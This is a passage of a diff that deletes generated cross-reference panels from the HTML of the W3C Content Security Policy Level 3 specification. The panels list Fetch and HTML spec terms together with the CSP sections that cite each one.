-    Integration with Fetch </a> <a href="#ref-for-concept-response-csp-list①">(2)</a> <a href="#ref-for-concept-response-csp-list②">(3)</a>
-    <li><a href="#ref-for-concept-response-csp-list③">4.1.1. 
-    Set response’s CSP list </a> <a href="#ref-for-concept-response-csp-list④">(2)</a> <a href="#ref-for-concept-response-csp-list⑤">(3)</a>
-    <li><a href="#ref-for-concept-response-csp-list⑥">4.1.4. 
-    Should response to request be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-response-csp-list⑦">4.2.1. 
-    Initialize a Document's CSP list </a> <a href="#ref-for-concept-response-csp-list⑧">(2)</a>
-    <li><a href="#ref-for-concept-response-csp-list⑨">4.2.2. 
-    Initialize a global object’s CSP list </a>
-    <li><a href="#ref-for-concept-response-csp-list①⓪">4.2.6. 
-    Should navigation response to navigation request of type from source
-    in target be blocked by Content Security Policy? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-current-url">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-current-url">https://fetch.spec.whatwg.org/#concept-request-current-url</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-current-url">2.4.2. 
-    Create a violation object for request, and policy. </a>
-    <li><a href="#ref-for-concept-request-current-url①">4.2.5. 
-    Should navigation request of type from source in target be blocked
-    by Content Security Policy? </a> <a href="#ref-for-concept-request-current-url②">(2)</a>
-    <li><a href="#ref-for-concept-request-current-url③">6.6.2.3. 
-    Does request match source list? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-destination">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-destination">https://fetch.spec.whatwg.org/#concept-request-destination</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-destination">5.3. 
-    Report a violation </a>
-    <li><a href="#ref-for-concept-request-destination①">6.1.1. child-src</a> <a href="#ref-for-concept-request-destination②">(2)</a>
-    <li><a href="#ref-for-concept-request-destination③">6.1.6. img-src</a>
-    <li><a href="#ref-for-concept-request-destination④">6.2.2.1. 
-    plugin-types Post-Request Check </a>
-    <li><a href="#ref-for-concept-request-destination⑤">6.2.3.1. 
-    sandbox Response Check </a>
-    <li><a href="#ref-for-concept-request-destination⑥">6.6.1.1. 
-    Script directives pre-request check </a>
-    <li><a href="#ref-for-concept-request-destination⑦">6.6.1.2. 
-    Script directives post-request check </a>
-    <li><a href="#ref-for-concept-request-destination⑧">6.7.1. 
-    Get the effective directive for request </a> <a href="#ref-for-concept-request-destination⑨">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-header-extract-mime-type">
-   <a href="https://fetch.spec.whatwg.org/#concept-header-extract-mime-type">https://fetch.spec.whatwg.org/#concept-header-extract-mime-type</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-header-extract-mime-type">6.2.2.1. 
-    plugin-types Post-Request Check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-extract-header-list-values">
-   <a href="https://fetch.spec.whatwg.org/#extract-header-list-values">https://fetch.spec.whatwg.org/#extract-header-list-values</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-extract-header-list-values">4.1.1. 
-    Set response’s CSP list </a> <a href="#ref-for-extract-header-list-values①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-fetch">
-   <a href="https://fetch.spec.whatwg.org/#concept-fetch">https://fetch.spec.whatwg.org/#concept-fetch</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-fetch">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-response-header-list">
-   <a href="https://fetch.spec.whatwg.org/#concept-response-header-list">https://fetch.spec.whatwg.org/#concept-response-header-list</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-response-header-list">4.1. 
-    Integration with Fetch </a>
-    <li><a href="#ref-for-concept-response-header-list①">4.1.1. 
-    Set response’s CSP list </a> <a href="#ref-for-concept-response-header-list②">(2)</a> <a href="#ref-for-concept-response-header-list③">(3)</a>
-    <li><a href="#ref-for-concept-response-header-list④">6.2.2.1. 
-    plugin-types Post-Request Check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-http-fetch">
-   <a href="https://fetch.spec.whatwg.org/#concept-http-fetch">https://fetch.spec.whatwg.org/#concept-http-fetch</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-http-fetch">4.1. 
-    Integration with Fetch </a> <a href="#ref-for-concept-http-fetch①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-http-network-fetch">
-   <a href="https://fetch.spec.whatwg.org/#concept-http-network-fetch">https://fetch.spec.whatwg.org/#concept-http-network-fetch</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-http-network-fetch">4.1. 
-    Integration with Fetch </a> <a href="#ref-for-concept-http-network-fetch①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-initiator">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-initiator">https://fetch.spec.whatwg.org/#concept-request-initiator</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-initiator">5.3. 
-    Report a violation </a>
-    <li><a href="#ref-for-concept-request-initiator①">6.7.1. 
-    Get the effective directive for request </a> <a href="#ref-for-concept-request-initiator②">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-integrity-metadata">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-integrity-metadata">https://fetch.spec.whatwg.org/#concept-request-integrity-metadata</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-integrity-metadata">6.6.1.1. 
-    Script directives pre-request check </a> <a href="#ref-for-concept-request-integrity-metadata①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-request-keepalive-flag">
-   <a href="https://fetch.spec.whatwg.org/#request-keepalive-flag">https://fetch.spec.whatwg.org/#request-keepalive-flag</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-request-keepalive-flag">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-local-scheme">
-   <a href="https://fetch.spec.whatwg.org/#local-scheme">https://fetch.spec.whatwg.org/#local-scheme</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-local-scheme">1.3. Changes from Level 2</a>
-    <li><a href="#ref-for-local-scheme①">2.2. Policies</a>
-    <li><a href="#ref-for-local-scheme②">4.2.1. 
-    Initialize a Document's CSP list </a>
-    <li><a href="#ref-for-local-scheme③">4.2.2. 
-    Initialize a global object’s CSP list </a> <a href="#ref-for-local-scheme④">(2)</a>
-    <li><a href="#ref-for-local-scheme⑤">7.8. 
-    CSP Inheriting to avoid bypasses </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-main-fetch">
-   <a href="https://fetch.spec.whatwg.org/#concept-main-fetch">https://fetch.spec.whatwg.org/#concept-main-fetch</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-main-fetch">4.1. 
-    Integration with Fetch </a> <a href="#ref-for-concept-main-fetch①">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-method">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-method">https://fetch.spec.whatwg.org/#concept-request-method</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-method">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-mode">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-mode">https://fetch.spec.whatwg.org/#concept-request-mode</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-mode">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-network-error">
-   <a href="https://fetch.spec.whatwg.org/#concept-network-error">https://fetch.spec.whatwg.org/#concept-network-error</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-network-error">4.1. 
-    Integration with Fetch </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-network-scheme">
-   <a href="https://fetch.spec.whatwg.org/#network-scheme">https://fetch.spec.whatwg.org/#network-scheme</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-network-scheme">1.3. Changes from Level 2</a> <a href="#ref-for-network-scheme①">(2)</a>
-    <li><a href="#ref-for-network-scheme②">6.6.2.6. 
-    Does url match expression in origin with redirect count? </a> <a href="#ref-for-network-scheme③">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-origin">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-origin">https://fetch.spec.whatwg.org/#concept-request-origin</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-origin">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-parser-metadata">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-parser-metadata">https://fetch.spec.whatwg.org/#concept-request-parser-metadata</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-parser-metadata">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-concept-request-parser-metadata①">6.6.1.1. 
-    Script directives pre-request check </a>
-    <li><a href="#ref-for-concept-request-parser-metadata②">6.6.1.2. 
-    Script directives post-request check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-redirect-count">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-redirect-count">https://fetch.spec.whatwg.org/#concept-request-redirect-count</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-redirect-count">6.6.2.3. 
-    Does request match source list? </a>
-    <li><a href="#ref-for-concept-request-redirect-count①">6.6.2.4. 
-    Does response to request match source list? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-redirect-mode">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-redirect-mode">https://fetch.spec.whatwg.org/#concept-request-redirect-mode</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-redirect-mode">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-redirect-status">
-   <a href="https://fetch.spec.whatwg.org/#redirect-status">https://fetch.spec.whatwg.org/#redirect-status</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-redirect-status">6.3.3.2. 
-    navigate-to Navigation Response Check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request">
-   <a href="https://fetch.spec.whatwg.org/#concept-request">https://fetch.spec.whatwg.org/#concept-request</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request">2.3. Directives</a> <a href="#ref-for-concept-request①">(2)</a> <a href="#ref-for-concept-request②">(3)</a> <a href="#ref-for-concept-request③">(4)</a> <a href="#ref-for-concept-request④">(5)</a>
-    <li><a href="#ref-for-concept-request⑤">2.4.2. 
-    Create a violation object for request, and policy. </a>
-    <li><a href="#ref-for-concept-request⑥">4.1. 
-    Integration with Fetch </a> <a href="#ref-for-concept-request⑦">(2)</a> <a href="#ref-for-concept-request⑧">(3)</a>
-    <li><a href="#ref-for-concept-request⑨">4.1.2. 
-    Report Content Security Policy violations for request </a>
-    <li><a href="#ref-for-concept-request①⓪">4.1.3. 
-    Should request be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-request①①">4.1.4. 
-    Should response to request be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-request①②">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-concept-request①③">4.2.1. 
-    Initialize a Document's CSP list </a>
-    <li><a href="#ref-for-concept-request①④">4.2.5. 
-    Should navigation request of type from source in target be blocked
-    by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-request①⑤">4.2.6. 
-    Should navigation response to navigation request of type from source
-    in target be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-request①⑥">5.3. 
-    Report a violation </a>
-    <li><a href="#ref-for-concept-request①⑦">6.1.1. child-src</a> <a href="#ref-for-concept-request①⑧">(2)</a>
-    <li><a href="#ref-for-concept-request①⑨">6.1.1.1. 
-    child-src Pre-request check </a>
-    <li><a href="#ref-for-concept-request②⓪">6.1.1.2. 
-    child-src Post-request check </a>
-    <li><a href="#ref-for-concept-request②①">6.1.2. connect-src</a>
-    <li><a href="#ref-for-concept-request②②">6.1.2.1. 
-    connect-src Pre-request check </a>
-    <li><a href="#ref-for-concept-request②③">6.1.2.2. 
-    connect-src Post-request check </a>
-    <li><a href="#ref-for-concept-request②④">6.1.3.1. 
-    default-src Pre-request check </a>
-    <li><a href="#ref-for-concept-request②⑤">6.1.3.2. 
-    default-src Post-request check </a>
-    <li><a href="#ref-for-concept-request②⑥">6.1.4.1. 
-    font-src Pre-request check </a>
-    <li><a href="#ref-for-concept-request②⑦">6.1.4.2. 
-    font-src Post-request check </a>
-    <li><a href="#ref-for-concept-request②⑧">6.1.5.1. 
-    frame-src Pre-request check </a>
-    <li><a href="#ref-for-concept-request②⑨">6.1.5.2. 
-    frame-src Post-request check </a>
-    <li><a href="#ref-for-concept-request③⓪">6.1.6. img-src</a> <a href="#ref-for-concept-request③①">(2)</a>
-    <li><a href="#ref-for-concept-request③②">6.1.6.1. 
-    img-src Pre-request check </a>
-    <li><a href="#ref-for-concept-request③③">6.1.6.2. 
-    img-src Post-request check </a>
-    <li><a href="#ref-for-concept-request③④">6.1.7.1. 
-    manifest-src Pre-request check </a>
-    <li><a href="#ref-for-concept-request③⑤">6.1.7.2. 
-    manifest-src Post-request check </a>
-    <li><a href="#ref-for-concept-request③⑥">6.1.8.1. 
-    media-src Pre-request check </a>
-    <li><a href="#ref-for-concept-request③⑦">6.1.8.2. 
-    media-src Post-request check </a>
-    <li><a href="#ref-for-concept-request③⑧">6.1.9.1. 
-    object-src Pre-request check </a>
-    <li><a href="#ref-for-concept-request③⑨">6.1.9.2. 
-    object-src Post-request check </a>
-    <li><a href="#ref-for-concept-request④⓪">6.1.10.1. 
-    prefetch-src Pre-request check </a>
-    <li><a href="#ref-for-concept-request④①">6.1.10.2. 
-    prefetch-src Post-request check </a>
-    <li><a href="#ref-for-concept-request④②">6.1.11. script-src</a>
-    <li><a href="#ref-for-concept-request④③">6.1.11.1. 
-    script-src Pre-request check </a>
-    <li><a href="#ref-for-concept-request④④">6.1.11.2. 
-    script-src Post-request check </a>
-    <li><a href="#ref-for-concept-request④⑤">6.1.12.1. 
-    script-src-elem Pre-request check </a>
-    <li><a href="#ref-for-concept-request④⑥">6.1.12.2. 
-    script-src-elem Post-request check </a>
-    <li><a href="#ref-for-concept-request④⑦">6.1.14. style-src</a>
-    <li><a href="#ref-for-concept-request④⑧">6.1.14.1. 
-    style-src Pre-request Check </a>
-    <li><a href="#ref-for-concept-request④⑨">6.1.14.2. 
-    style-src Post-request Check </a>
-    <li><a href="#ref-for-concept-request⑤⓪">6.1.15.1. 
-    style-src-elem Pre-request Check </a>
-    <li><a href="#ref-for-concept-request⑤①">6.1.15.2. 
-    style-src-elem Post-request Check </a>
-    <li><a href="#ref-for-concept-request⑤②">6.1.17.1. 
-    worker-src Pre-request Check </a>
-    <li><a href="#ref-for-concept-request⑤③">6.1.17.2. 
-    worker-src Post-request Check </a>
-    <li><a href="#ref-for-concept-request⑤④">6.2.2.1. 
-    plugin-types Post-Request Check </a>
-    <li><a href="#ref-for-concept-request⑤⑤">6.2.3.1. 
-    sandbox Response Check </a>
-    <li><a href="#ref-for-concept-request⑤⑥">6.3.1.1. 
-    form-action Pre-Navigation Check </a>
-    <li><a href="#ref-for-concept-request⑤⑦">6.3.2.1. 
-    frame-ancestors Navigation Response Check </a>
-    <li><a href="#ref-for-concept-request⑤⑧">6.3.3.1. 
-    navigate-to Pre-Navigation Check </a>
-    <li><a href="#ref-for-concept-request⑤⑨">6.3.3.2. 
-    navigate-to Navigation Response Check </a>
-    <li><a href="#ref-for-concept-request⑥⓪">6.6.1.1. 
-    Script directives pre-request check </a>
-    <li><a href="#ref-for-concept-request⑥①">6.6.1.2. 
-    Script directives post-request check </a>
-    <li><a href="#ref-for-concept-request⑥②">6.6.2.1. 
-    Does request violate policy? </a>
-    <li><a href="#ref-for-concept-request⑥③">6.6.2.2. 
-    Does nonce match source list? </a>
-    <li><a href="#ref-for-concept-request⑥④">6.6.2.3. 
-    Does request match source list? </a> <a href="#ref-for-concept-request⑥⑤">(2)</a>
-    <li><a href="#ref-for-concept-request⑥⑥">6.6.2.4. 
-    Does response to request match source list? </a>
-    <li><a href="#ref-for-concept-request⑥⑦">6.7.1. 
-    Get the effective directive for request </a> <a href="#ref-for-concept-request⑥⑧">(2)</a>
-    <li><a href="#ref-for-concept-request⑥⑨">6.7.2. 
-    Get the effective directive for inline checks </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-response">
-   <a href="https://fetch.spec.whatwg.org/#concept-response">https://fetch.spec.whatwg.org/#concept-response</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-response">2.3. Directives</a> <a href="#ref-for-concept-response①">(2)</a> <a href="#ref-for-concept-response②">(3)</a> <a href="#ref-for-concept-response③">(4)</a>
-    <li><a href="#ref-for-concept-response④">4.1. 
-    Integration with Fetch </a> <a href="#ref-for-concept-response⑤">(2)</a> <a href="#ref-for-concept-response⑥">(3)</a> <a href="#ref-for-concept-response⑦">(4)</a> <a href="#ref-for-concept-response⑧">(5)</a> <a href="#ref-for-concept-response⑨">(6)</a> <a href="#ref-for-concept-response①⓪">(7)</a>
-    <li><a href="#ref-for-concept-response①①">4.1.1. 
-    Set response’s CSP list </a>
-    <li><a href="#ref-for-concept-response①②">4.1.4. 
-    Should response to request be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-response①③">4.2. 
-    Integration with HTML </a> <a href="#ref-for-concept-response①④">(2)</a>
-    <li><a href="#ref-for-concept-response①⑤">4.2.1. 
-    Initialize a Document's CSP list </a>
-    <li><a href="#ref-for-concept-response①⑥">4.2.2. 
-    Initialize a global object’s CSP list </a>
-    <li><a href="#ref-for-concept-response①⑦">4.2.6. 
-    Should navigation response to navigation request of type from source
-    in target be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-response①⑧">6.1.1.2. 
-    child-src Post-request check </a>
-    <li><a href="#ref-for-concept-response①⑨">6.1.2.2. 
-    connect-src Post-request check </a>
-    <li><a href="#ref-for-concept-response②⓪">6.1.3.2. 
-    default-src Post-request check </a>
-    <li><a href="#ref-for-concept-response②①">6.1.4.2. 
-    font-src Post-request check </a>
-    <li><a href="#ref-for-concept-response②②">6.1.5.2. 
-    frame-src Post-request check </a>
-    <li><a href="#ref-for-concept-response②③">6.1.6.2. 
-    img-src Post-request check </a>
-    <li><a href="#ref-for-concept-response②④">6.1.7.2. 
-    manifest-src Post-request check </a>
-    <li><a href="#ref-for-concept-response②⑤">6.1.8.2. 
-    media-src Post-request check </a>
-    <li><a href="#ref-for-concept-response②⑥">6.1.9.2. 
-    object-src Post-request check </a>
-    <li><a href="#ref-for-concept-response②⑦">6.1.10.2. 
-    prefetch-src Post-request check </a>
-    <li><a href="#ref-for-concept-response②⑧">6.1.11. script-src</a>
-    <li><a href="#ref-for-concept-response②⑨">6.1.11.2. 
-    script-src Post-request check </a>
-    <li><a href="#ref-for-concept-response③⓪">6.1.12.2. 
-    script-src-elem Post-request check </a>
-    <li><a href="#ref-for-concept-response③①">6.1.14. style-src</a>
-    <li><a href="#ref-for-concept-response③②">6.1.14.2. 
-    style-src Post-request Check </a>
-    <li><a href="#ref-for-concept-response③③">6.1.15.2. 
-    style-src-elem Post-request Check </a>
-    <li><a href="#ref-for-concept-response③④">6.1.17.2. 
-    worker-src Post-request Check </a>
-    <li><a href="#ref-for-concept-response③⑤">6.2.2.1. 
-    plugin-types Post-Request Check </a>
-    <li><a href="#ref-for-concept-response③⑥">6.2.3.1. 
-    sandbox Response Check </a>
-    <li><a href="#ref-for-concept-response③⑦">6.2.3.2. 
-    sandbox Initialization </a>
-    <li><a href="#ref-for-concept-response③⑧">6.3.2.1. 
-    frame-ancestors Navigation Response Check </a>
-    <li><a href="#ref-for-concept-response③⑨">6.3.3.1. 
-    navigate-to Pre-Navigation Check </a> <a href="#ref-for-concept-response④⓪">(2)</a>
-    <li><a href="#ref-for-concept-response④①">6.3.3.2. 
-    navigate-to Navigation Response Check </a>
-    <li><a href="#ref-for-concept-response④②">6.6.1.2. 
-    Script directives post-request check </a>
-    <li><a href="#ref-for-concept-response④③">6.6.2.4. 
-    Does response to request match source list? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-request-destination-script-like">
-   <a href="https://fetch.spec.whatwg.org/#request-destination-script-like">https://fetch.spec.whatwg.org/#request-destination-script-like</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-request-destination-script-like">6.1.11. script-src</a>
-    <li><a href="#ref-for-request-destination-script-like①">6.6.1.1. 
-    Script directives pre-request check </a>
-    <li><a href="#ref-for-request-destination-script-like②">6.6.1.2. 
-    Script directives post-request check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-response-status">
-   <a href="https://fetch.spec.whatwg.org/#concept-response-status">https://fetch.spec.whatwg.org/#concept-response-status</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-response-status">6.3.3.1. 
-    navigate-to Pre-Navigation Check </a>
-    <li><a href="#ref-for-concept-response-status①">6.3.3.2. 
-    navigate-to Navigation Response Check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-target-browsing-context">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-target-browsing-context">https://fetch.spec.whatwg.org/#concept-request-target-browsing-context</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-target-browsing-context">6.1.1. child-src</a>
-    <li><a href="#ref-for-concept-request-target-browsing-context①">6.7.1. 
-    Get the effective directive for request </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-response-url">
-   <a href="https://fetch.spec.whatwg.org/#concept-response-url">https://fetch.spec.whatwg.org/#concept-response-url</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-response-url">4.1.1. 
-    Set response’s CSP list </a>
-    <li><a href="#ref-for-concept-response-url①">4.2.1. 
-    Initialize a Document's CSP list </a>
-    <li><a href="#ref-for-concept-response-url②">4.2.2. 
-    Initialize a global object’s CSP list </a>
-    <li><a href="#ref-for-concept-response-url③">4.2.6. 
-    Should navigation response to navigation request of type from source
-    in target be blocked by Content Security Policy? </a>
-    <li><a href="#ref-for-concept-response-url④">6.6.2.4. 
-    Does response to request match source list? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-request-window">
-   <a href="https://fetch.spec.whatwg.org/#concept-request-window">https://fetch.spec.whatwg.org/#concept-request-window</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-request-window">5.3. 
-    Report a violation </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-parser-inserted">
-   <a href="https://html.spec.whatwg.org/multipage/scripting.html#parser-inserted">https://html.spec.whatwg.org/multipage/scripting.html#parser-inserted</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-parser-inserted">1.3. Changes from Level 2</a>
-    <li><a href="#ref-for-parser-inserted①">6.6.1.1. 
-    Script directives pre-request check </a>
-    <li><a href="#ref-for-parser-inserted②">6.6.1.2. 
-    Script directives post-request check </a>
-    <li><a href="#ref-for-parser-inserted③">8.2. 
-    Usage of "'strict-dynamic'" </a> <a href="#ref-for-parser-inserted④">(2)</a> <a href="#ref-for-parser-inserted⑤">(3)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-dedicatedworkerglobalscope">
-   <a href="https://html.spec.whatwg.org/multipage/workers.html#dedicatedworkerglobalscope">https://html.spec.whatwg.org/multipage/workers.html#dedicatedworkerglobalscope</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-dedicatedworkerglobalscope">4.2.2. 
-    Initialize a global object’s CSP list </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-sharedworker">
-   <a href="https://html.spec.whatwg.org/multipage/workers.html#sharedworker">https://html.spec.whatwg.org/multipage/workers.html#sharedworker</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-sharedworker">6.1.1. child-src</a>
-    <li><a href="#ref-for-sharedworker①">6.1.17. worker-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-sharedworkerglobalscope">
-   <a href="https://html.spec.whatwg.org/multipage/workers.html#sharedworkerglobalscope">https://html.spec.whatwg.org/multipage/workers.html#sharedworkerglobalscope</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-sharedworkerglobalscope">4.2.2. 
-    Initialize a global object’s CSP list </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-window">
-   <a href="https://html.spec.whatwg.org/multipage/window-object.html#window">https://html.spec.whatwg.org/multipage/window-object.html#window</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-window">2.4.1. 
-    Create a violation object for global, policy, and directive </a>
-    <li><a href="#ref-for-window①">4.2.3. 
-    Retrieve the CSP list of an object </a>
-    <li><a href="#ref-for-window②">5.3. 
-    Report a violation </a> <a href="#ref-for-window③">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-worker">
-   <a href="https://html.spec.whatwg.org/multipage/workers.html#worker">https://html.spec.whatwg.org/multipage/workers.html#worker</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-worker">1.2. Goals</a>
-    <li><a href="#ref-for-worker①">6.1.1. child-src</a>
-    <li><a href="#ref-for-worker②">6.1.17. worker-src</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-workerglobalscope">
-   <a href="https://html.spec.whatwg.org/multipage/workers.html#workerglobalscope">https://html.spec.whatwg.org/multipage/workers.html#workerglobalscope</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-workerglobalscope">2.2. Policies</a>
-    <li><a href="#ref-for-workerglobalscope①">4.2. 
-    Integration with HTML </a> <a href="#ref-for-workerglobalscope②">(2)</a>
-    <li><a href="#ref-for-workerglobalscope③">4.2.3. 
-    Retrieve the CSP list of an object </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-the-a-element">
-   <a href="https://html.spec.whatwg.org/multipage/text-level-semantics.html#the-a-element">https://html.spec.whatwg.org/multipage/text-level-semantics.html#the-a-element</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-the-a-element">6.1.2. connect-src</a>
-    <li><a href="#ref-for-the-a-element①">6.3.3. navigate-to</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-an-iframe-srcdoc-document">
-   <a href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#an-iframe-srcdoc-document">https://html.spec.whatwg.org/multipage/iframe-embed-object.html#an-iframe-srcdoc-document</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-an-iframe-srcdoc-document">4.2.1. 
-    Initialize a Document's CSP list </a> <a href="#ref-for-an-iframe-srcdoc-document①">(2)</a>
-    <li><a href="#ref-for-an-iframe-srcdoc-document②">4.2.2. 
-    Initialize a global object’s CSP list </a>
-    <li><a href="#ref-for-an-iframe-srcdoc-document③">6.2.1.1. 
-    Is base allowed for document? </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-applet">
-   <a href="https://html.spec.whatwg.org/multipage/obsolete.html#applet">https://html.spec.whatwg.org/multipage/obsolete.html#applet</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-applet">4.2. 
-    Integration with HTML </a>
-    <li><a href="#ref-for-applet①">6.1.9. object-src</a> <a href="#ref-for-applet②">(2)</a>
-    <li><a href="#ref-for-applet③">6.2.2.2. 
-    Should plugin element be blocked a priori by Content
-    Security Policy?: </a>
-    <li><a href="#ref-for-applet④">6.3.2. frame-ancestors</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-ascii-serialisation-of-an-origin">
-   <a href="https://html.spec.whatwg.org/multipage/origin.html#ascii-serialisation-of-an-origin">https://html.spec.whatwg.org/multipage/origin.html#ascii-serialisation-of-an-origin</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-ascii-serialisation-of-an-origin">6.3.2.1. 
-    frame-ancestors Navigation Response Check </a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-concept-document-window">
-   <a href="https://html.spec.whatwg.org/multipage/window-object.html#concept-document-window">https://html.spec.whatwg.org/multipage/window-object.html#concept-document-window</a><b>Referenced in:</b>
-   <ul>
-    <li><a href="#ref-for-concept-document-window">4.2.3. 
-    Retrieve the CSP list of an object </a>
-    <li><a href="#ref-for-concept-document-window①">5.3. 
-    Report a violation </a> <a href="#ref-for-concept-document-window②">(2)</a>
-   </ul>
-  </aside>
-  <aside class="dfn-panel" data-for="term-for-the-base-element">
